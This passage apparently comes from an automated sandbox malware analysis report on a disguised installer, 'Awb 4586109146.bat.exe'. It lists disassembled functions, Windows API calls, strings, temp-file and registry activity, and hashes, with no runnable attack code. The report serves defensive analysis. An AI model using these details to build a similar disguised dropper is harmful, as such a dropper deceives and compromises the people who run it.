lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,?,00405359,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000), ref: 00406503

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004063ED
Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll, xrefs: 00406301
Call, xrefs: 00406306, 004063E1, 004063E8, 004063EC, 00406406, 00406407, 0040641C, 0040642F, 0040644B, 00406476, 004064AA, 004064B0, 004064CC, 004064DF, 004064FC, 00406502, 0040650E, 00406541
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004064A5

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-3852979141
Opcode ID: be842abed2e65b63b3d72d51674aff3c14f059aabebd99e4c76d62d1777cce00
Instruction ID: 29f0adb049bea166a756856afc1b7ff582c4fdfd81cc2e884c30b49282791dbd
Opcode Fuzzy Hash: be842abed2e65b63b3d72d51674aff3c14f059aabebd99e4c76d62d1777cce00
Instruction Fuzzy Hash: E6611071A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\sillinesses,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\sillinesses,?,?,00000031), ref: 004017D5

Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Footballer Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7

Part of subcall function 00405322: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
Part of subcall function 00405322: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,0040327A,0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0), ref: 0040537D
Part of subcall function 00405322: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll), ref: 0040538F
Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD

Strings

Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\sillinesses, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp\nscEFD5.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp$C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll$C:\Users\user\AppData\Local\sillinesses$Call
API String ID: 1941528284-577586341
Opcode ID: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
Opcode Fuzzy Hash: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D

Function 00405322 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
lstrlenW.KERNEL32(0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,0040327A,0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0), ref: 0040537D
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll), ref: 0040538F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll, xrefs: 00405343, 00405353, 00405359, 0040537C, 00405388

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll
API String ID: 2531174081-1212379810
Opcode ID: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
Opcode Fuzzy Hash: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8

Function 00403116 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403180
GetTickCount.KERNEL32 ref: 00403227
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403250
wsprintfW.USER32 ref: 00403263

Strings

JrA, xrefs: 004031ED, 004031FF
@, xrefs: 0040319A
... %d%%, xrefs: 0040325D

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$JrA$@
API String ID: 551687249-1851874788
Opcode ID: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
Opcode Fuzzy Hash: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A

Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405EA7

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18

Function 00406624 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
wsprintfW.USER32 ref: 00406676
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A

Strings

%s%S.dll, xrefs: 00406670
UXTHEME, xrefs: 0040662D
\, xrefs: 0040664C

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99

Function 004057F1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
GetLastError.KERNEL32 ref: 00405848
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
GetLastError.KERNEL32 ref: 00405867

Strings

C:\Users\user\Desktop, xrefs: 004057F1

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-1876063424
Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
Instruction ID: d156970015101e62572267df52bf1fb018b172c5ebb67f048bc3511340661aba
Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
Instruction Fuzzy Hash: EB010872D00219EADF009FA1C944BEFBBB8EF14304F00803AE945B6280D7789618CFA9

Function 00405DDF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405DFD
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",0040338D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9), ref: 00405E18

Strings

nsa, xrefs: 00405DEC
"C:\Users\user\Desktop\Awb 4586109146.bat.exe", xrefs: 00405DDF
C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE4, 00405DE8

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Awb 4586109146.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2182324452
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64

Function 73961777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 73961B5F: GlobalFree.KERNEL32(?), ref: 73961DB2
Part of subcall function 73961B5F: GlobalFree.KERNEL32(?), ref: 73961DB7
Part of subcall function 73961B5F: GlobalFree.KERNEL32(?), ref: 73961DBC

GlobalFree.KERNEL32(00000000), ref: 73961825
FreeLibrary.KERNEL32(?), ref: 739618AB
GlobalFree.KERNEL32(00000000), ref: 739618D0

Part of subcall function 73962352: GlobalAlloc.KERNEL32(00000040,?), ref: 73962383

Part of subcall function 73962724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,739617F6,00000000), ref: 739627F4

Part of subcall function 739615C6: wsprintfW.USER32 ref: 739615F4

Strings

, xrefs: 739618B1

Memory Dump Source

Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true

Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 58b48bd3c5d9bc9198811c75d1319ba26633cbab0f2328db9d62cf8ca1e4361c
Instruction ID: 82ba49fe69d4bfe28995f96736068f3b789bbe48da7b5881affc6107553d4947
Opcode Fuzzy Hash: 58b48bd3c5d9bc9198811c75d1319ba26633cbab0f2328db9d62cf8ca1e4361c
Instruction Fuzzy Hash: E241BEB2402348EBEB119F749994B9637BCBF04395F185079E94B9E1C6DBB8C084C7A3

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nscEFD5.tmp,00000023,00000011,00000002), ref: 0040242F
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp,00000000,00000011,00000002), ref: 0040246F
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp,00000000,00000011,00000002), ref: 00402557

Strings

C:\Users\user\AppData\Local\Temp\nscEFD5.tmp, xrefs: 00402420, 0040242E, 00402445, 00402459, 00402464

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
